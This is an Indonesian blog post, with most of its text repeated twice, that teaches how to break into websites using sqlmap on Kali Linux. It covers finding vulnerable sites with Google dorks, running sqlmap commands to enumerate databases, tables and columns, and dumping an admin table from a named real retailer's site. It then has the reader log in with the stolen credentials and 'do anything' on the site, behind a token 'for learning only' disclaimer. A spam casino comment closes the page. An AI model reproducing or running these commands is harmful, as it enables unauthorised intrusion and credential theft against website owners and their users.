Assalamu'alaikum wr......wb
Bagaimana sih cara hack Website Via SQLMAP di Kali Linux?
sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
download google dork DISINI
jika sudah mendapatkan target
1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h
2. untuk melakukan hacking berikan perintah :
sqlmap -u www.target.com/syntaxerrorr=2
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 --dbs
disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu enter
di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql
3. lanjutkan lagi dengan perintah
untuk melihat isi tables
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --tables
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --tables
bisa langsung lompat untuk melihat columns dengan perintah
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --columns
CONTOH :
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --columns
tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja
4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password
5. saatnya mencari password & user admin
dengan perintah :
sqlmap -u www.target-anda.com/php?id=sekian -D database-target -T admin --dump
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin --dump
dan secara otomatis sqlmap akan mencari user & password admin yang tersimpan pada website tersebut
7 . LOGIN :D
8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut
jika masih kurang jelas dalam penulisan saya
anda bisa menonton video saya disini
https://www.youtube.com/watch?v=1c2Jx25XwBk
di dalam video saya tidak ada manipulasi semuanya real (asli) tanpa ada editan sedikitpun
Sekian ya sobat..
Hati-hati dalam menggunakan tutor ini
Admin tidak bertanggung jawab jika terjadi sesuatu pada Website orang.. ini hanya unutk belajar.
Bagaimana sih cara hack Website Via SQLMAP di Kali Linux?
sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
download google dork DISINI
jika sudah mendapatkan target
1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h
2. untuk melakukan hacking berikan perintah :
sqlmap -u www.target.com/syntaxerrorr=2
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 --dbs
disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu enter
di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql
3. lanjutkan lagi dengan perintah
untuk melihat isi tables
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --tables
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --tables
bisa langsung lompat untuk melihat columns dengan perintah
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --columns
CONTOH :
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --columns
tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja
4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password
5. saatnya mencari password & user admin
dengan perintah :
sqlmap -u www.target-anda.com/php?id=sekian -D database-target -T admin --dump
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin --dump
6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan
8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut
jika masih kurang jelas dalam penulisan saya
anda bisa menonton video saya disini
https://www.youtube.com/watch?v=1c2Jx25XwBk
di dalam video saya tidak ada manipulasi semuanya real (asli) tanpa ada editan sedikitpun
Sekian ya sobat..
Hati-hati dalam menggunakan tutor ini
Admin tidak bertanggung jawab jika terjadi sesuatu pada Website orang.. ini hanya unutk belajar.
Sign up here with your email
1 comments:
Write commentsmerit casino bonus code and
ReplyIf you're playing 메리트 카지노 at an online casino, you should check out the review 1xbet korean of merit casino bonus code. There are many things that merit casino 제왕카지노 can Rating: 5 · 1 vote